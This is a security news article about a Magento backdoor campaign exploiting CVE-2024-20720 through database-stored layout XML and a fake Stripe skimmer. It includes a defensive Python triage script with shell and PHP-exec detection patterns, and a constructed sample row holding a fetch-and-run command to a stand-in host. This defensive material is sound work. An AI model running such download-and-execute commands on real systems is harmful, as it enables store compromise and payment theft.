Stealthy XML Backdoor Haunts Magento Stores – New Threat Exploits Critical Vulnerability (CVE-2024-20720)

Magento merchants, brace yourselves. A cunning new malware campaign is targeting your online stores with an insidious twist. Researchers at Sansec have uncovered a persistent backdoor lurking within the XML code of Magento websites, a method designed to ensure the infection keeps returning even after you think you’ve cleaned up.

The Sneaky Exploit

Attackers are ruthlessly exploiting a recently patched critical vulnerability (CVE-2024-20720) in Magento. They’re injecting malicious code into a layout template tucked away in your store’s database. This crafty layout template uses the Magento layout system and a commonly installed package to secretly execute attacker-controlled commands.

The worst part? This attack is linked to your checkout page. Every time a customer visits their shopping cart, the malware triggers. It reinfects a vital system controller, guaranteeing its unwelcome return.
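One way to triage the database-stored layout templates described above, added here as an example (not Sansec's or Magento's code). It assumes rows exported from Magento's `layout_update` table as `(layout_update_id, handle, xml)` tuples; the indicator patterns are illustrative heuristics chosen for this example, not signatures of this campaign, and the sample rows are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Heuristics are assumptions made for this example, not Sansec's signatures.
PHP_EXEC = re.compile(r"^\s*\\?(system|exec|passthru|shell_exec|proc_open|popen)\s*$", re.I)
SHELL_HINT = re.compile(r"\bsed\s+-i\b|\b(?:curl|wget)\s|\|\s*(?:sh|bash)\b|base64\s+(?:-d|--decode)|/bin/(?:sh|bash)\b", re.I)
CART_HANDLES = {"checkout_cart_index"}  # layout handle rendered for the shopping cart page
XSI = "http://www.w3.org/2001/XMLSchema-instance"

def layout_strings(xml_text):
    """Return every attribute value and text node of a layout XML fragment."""
    # Stored rows are fragments that may use xsi:type, so wrap them in a root
    # that declares the prefix. A DOCTYPE inside the wrapper is a parse error,
    # which also keeps entity-expansion tricks out of the parser.
    root = ET.fromstring(f'<layout xmlns:xsi="{XSI}">{xml_text}</layout>')
    out = []
    for el in root.iter():
        out.extend(el.attrib.values())
        out.extend(t for t in (el.text, el.tail) if t and t.strip())
    return out

def triage(rows):
    """rows: (layout_update_id, handle, xml) tuples. Returns the flagged rows."""
    flagged = []
    for row_id, handle, xml_text in rows:
        reasons = set()
        try:
            strings = layout_strings(xml_text)
        except ET.ParseError:
            # Malformed rows deserve a manual look; still pattern-match the raw text.
            reasons.add("unparseable XML")
            strings = [xml_text]
        for s in strings:
            if PHP_EXEC.match(s):
                reasons.add("PHP command-execution function name as a value")
            if SHELL_HINT.search(s):
                reasons.add("shell command fragment")
        if reasons and handle in CART_HANDLES:
            reasons.add("bound to the cart page handle")
        if reasons:
            flagged.append((row_id, handle, sorted(reasons)))
    return flagged

# Constructed sample rows (not taken from a real store or from the campaign).
SAMPLE_ROWS = [
    (1, "cms_index_index", '<body><referenceContainer name="content"><block class="Magento\\Cms\\Block\\Widget\\Block" name="promo"><action method="setData"><argument name="name" xsi:type="string">block_id</argument><argument name="value" xsi:type="string">7</argument></action></block></referenceContainer></body>'),
    (2, "checkout_cart_index", '<body><referenceContainer name="content"><block class="Vendor\\Placeholder\\Block" name="constructed"><action method="placeholder"><argument name="callback" xsi:type="string">system</argument><argument name="arg" xsi:type="string">curl -s https://example.invalid/p | sh</argument></action></block></referenceContainer></body>'),
    (3, "default", "<body><block"),
]
```

Anything `triage` flags needs a manual look at the row and its `updated_at` timestamp; a clean result is not proof the store is clean.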

A Two-Pronged Attack

This isn’t just about persistence. These cybercriminals have a double whammy in store:

  1. Persistent Backdoor: They get unfettered remote control of your website. Think of it as a secret entrance they can use to slip in and out at will.
  2. Stolen Payment Data: The attackers are siphoning off sensitive customer payment details using a fake Stripe payment form. They’re sending this stolen data off to a different compromised Magento store.

What You Need to Do – NOW

Affected merchants, there’s no time to waste. Here’s your action plan:

  1. Scan and Seek: Use Sansec’s eComscan scanner to hunt down any hidden backdoors lurking in your system.
  2. Patch Immediately: Upgrade your Magento installation to the latest secured versions (2.4.6-p4, 2.4.5-p6, or 2.4.4-p7) to slam the door shut on this vulnerability.

The Bigger Picture

This attack is a chilling reminder of the relentless threat landscape online stores face. Staying vigilant, keeping software up-to-date, and using specialized security tools are your best weapons in this ongoing battle.